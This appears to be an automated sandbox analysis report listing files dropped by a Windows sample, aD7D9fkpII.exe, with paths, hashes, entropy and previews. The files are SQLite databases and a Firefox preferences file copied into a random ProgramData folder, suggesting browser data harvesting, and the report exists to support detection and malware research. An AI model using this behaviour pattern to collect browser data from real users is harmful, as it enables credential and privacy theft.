                                                                                                                                                                                                                                                                        Preview:MDMP..a..... ........Ung........................0...........d...f!..........T.......8...........T......................................................................................................................eJ..............GenuineIntel............T............Ung.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER7582.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8314
                                                                                                                                                                                                                                                                        Entropy (8bit):3.693293347434342
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJ5s6j6YEIBSU9Grj5gmftuJvVprZ89blcsfdDwXm:R6lXJy6j6YEOSU9Grj5gmftuJv+lvfR9
                                                                                                                                                                                                                                                                        MD5:7B14EDA7C5B5DD83AC9075AED72E0A83
                                                                                                                                                                                                                                                                        SHA1:F5F47EDF4CED18534DA34F89D32580A3F3F15C31
                                                                                                                                                                                                                                                                        SHA-256:838F9EFC880B2829C4EFA5843A18CC0AA4ECF974F6E2C5E100C5F69B74FE824A
                                                                                                                                                                                                                                                                        SHA-512:26CAEB4B16CEB86C660F47E6C4676601B8EBC07134A7F0307F11FB67F0F721BCA6A2A0467BF313DB6512A880470EAF26428FD169624EC4A60F55AB600667A97E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.0.8.<./.P.i.

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER75B2.tmp.xml

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4661
                                                                                                                                                                                                                                                                        Entropy (8bit):4.469043406161844
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:uIjfQI7KLa7VSJ/nDn8PnB5ZKK+Uz9zhAd:uI8YKLa74vzCBEUz9zhO
                                                                                                                                                                                                                                                                        MD5:42BE395DBE71F9E48774E7840B5BDA46
                                                                                                                                                                                                                                                                        SHA1:E99956EBAB49E5DC028829A07F7F9A1F80C967EA
                                                                                                                                                                                                                                                                        SHA-256:8FC1CBC6ACF5C61481DE87FB0C834879ABE721D4DE0C445925FDA8C37414C37F
                                                                                                                                                                                                                                                                        SHA-512:BCC3237C352CCC4C1D3CF509DFBFB2B5E58C81F22E31E9E2F52A43FA75CEF482A62D7EF2E1C4A2C7B386E37E597DC6E967EC81B866B5DA12584C0DE1458308BA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="649342" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                        C:\ProgramData\TRQ9ZCBA1N7Q\47GLNG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                                        Entropy (8bit):1.265495754907874
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:8/2qOB1nxCkMXSAELyKOMq+8yC8F/YfU5m+OlTLVumK:Bq+n0JX9ELyKOMq+8y9/OwV
                                                                                                                                                                                                                                                                        MD5:E6736A04C341B6E15AD98A4CB315D61F
                                                                                                                                                                                                                                                                        SHA1:8130F1C1BA4B4CC72DEB77BE39853F75C3DD5005
                                                                                                                                                                                                                                                                        SHA-256:8D48A427B9E34860CE36D0AEAA7DC44788093085BE22AB2A766CFB580A11384B
                                                                                                                                                                                                                                                                        SHA-512:A93F7D721E87A1A35B0D40AD19514E09DD636C52C90E612E68FEDA231A1B42E1012F90F19AFEF35B03DA9FE2DB8F4D0F819540877A328D76E1506F2E03E681EE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\TRQ9ZCBA1N7Q\4W4EKNGVA

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\TRQ9ZCBA1N7Q\79H47Y

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):294912
                                                                                                                                                                                                                                                                        Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                        MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                        SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                        SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                        SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\TRQ9ZCBA1N7Q\79HDJ5

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\TRQ9ZCBA1N7Q\79R16X

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\TRQ9ZCBA1N7Q\7GDT2N

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                                                        Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                                                        MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                                                        SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                                                        SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                                                        SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                                                                                                                                                                                                        C:\ProgramData\TRQ9ZCBA1N7Q\CTJWTJ

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\TRQ9ZCBA1N7Q\D2NGDB16F

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\TRQ9ZCBA1N7Q\IW4WT2

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9504
                                                                                                                                                                                                                                                                        Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                        MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                        SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                        SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                        SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                        C:\ProgramData\TRQ9ZCBA1N7Q\NGVAAA

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\TRQ9ZCBA1N7Q\RQ1VK6

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                                                        Entropy (8bit):4.692024230831571
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                                                                                                                                                                                                                                        MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                                                                                                                                                                                                                                        SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                                                                                                                                                                                                                                        SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                                                                                                                                                                                                                                        SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\122a50db-0cca-4cb6-8c04-fe60a6d430d8.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):44612
                                                                                                                                                                                                                                                                        Entropy (8bit):6.0964151545592395
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBawu9hDO6vP6O9PWvWTP+IcGoup1Xl3jVzXr4CCAg:z/Ps+wsI7ynEz6bchu3VlXr4CRo1
                                                                                                                                                                                                                                                                        MD5:E0745BC613E097D0F764CBA03B44CC31
                                                                                                                                                                                                                                                                        SHA1:FCA07BB3EEBD371EF25AAA103E6F890777C0CBAE
                                                                                                                                                                                                                                                                        SHA-256:4B8D8648C7719B4CD609B2E8E9DC06D508CE0B6FDFB44FCE84272E49E04AE8F2
                                                                                                                                                                                                                                                                        SHA-512:E1D58A61CC2EA067E59EFD3CD5E4E2EECDC25E818034B28968E45CBC29171B3956322733637F7524E2EC03BA5EE61DB2E9BB2F44E51FD14799F4CDA4F71C1A48
                                                                                                                                                                                                                                                                        Malicious:false
